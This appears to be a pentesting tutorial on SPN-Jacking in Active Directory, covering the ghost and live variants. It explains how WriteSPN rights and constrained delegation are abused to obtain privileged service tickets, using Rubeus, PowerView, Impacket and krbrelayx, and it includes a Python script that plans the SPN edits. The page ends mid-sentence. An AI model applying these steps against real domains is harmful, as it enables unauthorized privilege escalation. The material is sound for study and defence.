SPN Jacking
SPN-Jacking is an alternative way to abuse WriteSPN rights when the usual route (targeted Kerberoasting of the account you can write an SPN to) fails because the password cannot be cracked. Instead of roasting, it manipulates Kerberos Constrained Delegation: the attacker needs control of an account that is configured for constrained delegation (SRV$ in the examples below) together with WriteSPN over the target account (WEB$), and uses the SPN write to make WEB$ the key holder for an SPN that SRV$ is allowed to delegate to.
Ghost SPN-Jacking
Ghost SPN-Jacking targets scenarios where an SPN previously associated with a computer or service account is no longer registered to anything, either because the account was deleted or renamed or because it belonged to a custom service class that has since been removed. Such stale entries are frequently left behind in the msDS-AllowedToDelegateTo attribute of accounts configured for Kerberos Constrained Delegation.
To enumerate WriteSPN rights we can use BloodHound or PowerView. In BloodHound the right shows up as the WriteSPN edge.
It's good practice to confirm the ACE with PowerView, pywerview, dacledit or adalanche, since BloodHound can miss this ACL.
If we find an account with this ACL, we also need to confirm that the machine account we control has constrained delegation configured (a populated msDS-AllowedToDelegateTo attribute).
To perform the Ghost SPN-Jacking attack we look for orphaned SPNs in the delegation list of SRV, the account we control, with the aim of assigning one of them to our target machine WEB. PowerView can list the servers configured for Constrained Delegation and map which servers they are allowed to delegate to, and Get-ConstrainedDelegation.ps1 displays the value of msDS-AllowedToDelegateTo (the list of SPNs for which the service may obtain service tickets through constrained delegation) and also flags orphaned entries, i.e. SPNs that no account in the domain currently holds.
After noting down the original state of the SPNs, we assign one of the orphaned SPNs to our target machine WEB by appending it to the servicePrincipalName attribute of WEB$.
Because the KDC resolves an SPN to the account that holds it and encrypts the resulting service ticket with that account's key, this breaks the SPN's intended association: WEB is now treated as the legitimate endpoint for the service the SPN originally named. We can then run the S4U extension in Rubeus as SRV$ (S4U2self followed by S4U2proxy) to obtain a service ticket for a privileged user to that SPN, which the KDC encrypts with the key of WEB$.
The ticket returned by Rubeus s4u doesn't give access to WEB as it stands: its service name is the orphaned SPN dhcp/DATABASE, whose hostname doesn't match the target and whose service class offers no useful attack path, so it has to be changed to a class such as CIFS. This is possible because the ticket is encrypted with the key of WEB$ while the service name (sname) sits in the unencrypted part of the ticket: we can rewrite it to a valid service class and set the hostname to match the target WEB (Rubeus does this with /altservice during s4u, or afterwards with tgssub).
Live SPN-Jacking
Live SPN-Jacking requires manipulating SPNs that are currently registered to another account and in use within the environment.
In environments with up-to-date Active Directory, the Domain Controller enforces SPN uniqueness, so typically only Domain Admins can assign a duplicate SPN to a different account. Attempting to add an SPN already associated with DBSRV to WEB is therefore rejected by the Domain Controller as a constraint violation. To get around this we first remove the SPN we want to use from DBSRV, temporarily breaking that association, which makes it possible to add the SPN to WEB. As always, take note of the original state of the SPNs so the changes can be reverted later.
Now we can use PowerView to remove the SPN from DBSRV and assign it to WEB.
This opens up an S4U attack. As before, the service name on the ticket wouldn't directly grant access to WEB, but we can alter the service class and hostname so the ticket can be used against our target computer. This time we use HTTP/WEB instead of CIFS, to connect over PowerShell Remoting (WinRM).
Once we have the ticket we restore the SPNs we removed.
Performing the attack from Linux requires tunnelling into the network first; chisel or ligolo can be used for that.
Then we use findDelegation (Impacket) to verify that the computer account we own has constrained delegation configured, and we take note of the original state of the SPNs.
Now we use krbrelayx's addspn.py to remove the SPN from DBSRV, after which we add the SPN to WEB and request the ticket with getST.
Using getST's -altservice option, which rewrites the service name in the returned ticket, eliminates the need to run tgssub afterwards to change the service class and hostname.
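The ghost/live distinction drawn above, and the remove-then-add ordering the uniqueness check forces in the live case, as an added Python example (not the page's tooling and not Get-ConstrainedDelegation.ps1). It takes the msDS-AllowedToDelegateTo values of the account we control and the servicePrincipalName values registered across the domain, both as constructed sample data standing in for the LDAP queries, classifies each delegation target as ghost (nobody holds it), live (another account holds it) or none (the target already holds it), and produces the ordered SPN edits plus the edits that restore the original state. The account names SRV$, DBSRV$, WEB$ and the SPN dhcp/DATABASE come from the text; corp.local, the remaining SPNs and the function names are assumptions.

```python
"""Plan SPN-jacking edits from two LDAP result sets.

Added example, not the page's tooling. The two dicts further down stand in
for these queries (constructed sample data, not from a real domain):
  (msDS-AllowedToDelegateTo=*)  -> account : SPNs it may delegate to
  (servicePrincipalName=*)      -> account : SPNs registered to it
"""
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Plan:
    kind: str                   # "ghost", "live" or "none"
    spn: str                    # value taken from msDS-AllowedToDelegateTo
    holder: Optional[str]       # account currently registering the SPN, if any
    steps: list = field(default_factory=list)    # ("add"|"remove", account, spn), in order
    restore: list = field(default_factory=list)  # edits that undo `steps`, in order


def normalise(spn: str) -> str:
    # AD matches and de-duplicates SPNs case-insensitively, so the index must too.
    return spn.lower()


def index_holders(registered: dict) -> dict:
    """Map every registered SPN (normalised) to the sAMAccountName holding it."""
    holders = {}
    for account, spns in registered.items():
        for spn in spns:
            holders[normalise(spn)] = account
    return holders


def plan_spn_jacking(owned: str, target: str, delegation: dict, registered: dict) -> list:
    """For each SPN `owned` may delegate to, work out how to make `target` its key holder."""
    holders = index_holders(registered)
    plans = []
    for spn in delegation.get(owned, []):
        holder = holders.get(normalise(spn))
        if holder == target:
            # Already registered to the target: S4U2proxy works without any SPN write.
            plans.append(Plan("none", spn, holder))
        elif holder is None:
            # Ghost SPN-jacking: no account holds it, so a single add passes the
            # DC's uniqueness check and the KDC will encrypt tickets for this
            # SPN with the target's key from now on.
            plans.append(Plan("ghost", spn, None,
                              steps=[("add", target, spn)],
                              restore=[("remove", target, spn)]))
        else:
            # Live SPN-jacking: a duplicate is rejected, so the SPN has to leave
            # its current holder before it can be added to the target; the
            # restore list puts it back in reverse order once the ticket is in hand.
            plans.append(Plan("live", spn, holder,
                              steps=[("remove", holder, spn), ("add", target, spn)],
                              restore=[("remove", target, spn), ("add", holder, spn)]))
    return plans


# Constructed sample data standing in for the two LDAP queries.
DELEGATION = {
    "SRV$": ["dhcp/DATABASE", "cifs/DBSRV.corp.local", "HTTP/DBSRV", "HTTP/WEB"],
}
REGISTERED = {
    "DBSRV$": ["cifs/dbsrv.corp.local", "HTTP/DBSRV"],
    "WEB$": ["HTTP/WEB"],
}

if __name__ == "__main__":
    for plan in plan_spn_jacking("SRV$", "WEB$", DELEGATION, REGISTERED):
        print(f"{plan.kind:5} {plan.spn:24} holder={plan.holder}")
        for verb, account, spn in plan.steps:
            print(f"      {verb:6} {spn} on {account}")
```

Each entry in `steps` maps one-to-one onto a PowerView Set-DomainObject edit of servicePrincipalName or an addspn.py call from krbrelayx, and `restore` is what you run after the ticket has been obtained. Write the restore list to disk before the first modification, and keep its order for the live case: the target has to give the SPN up before the original holder can take it back without tripping the same uniqueness check that forced the removal in the first place.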
A really neat trick to restore a list of SPNs from a txt file is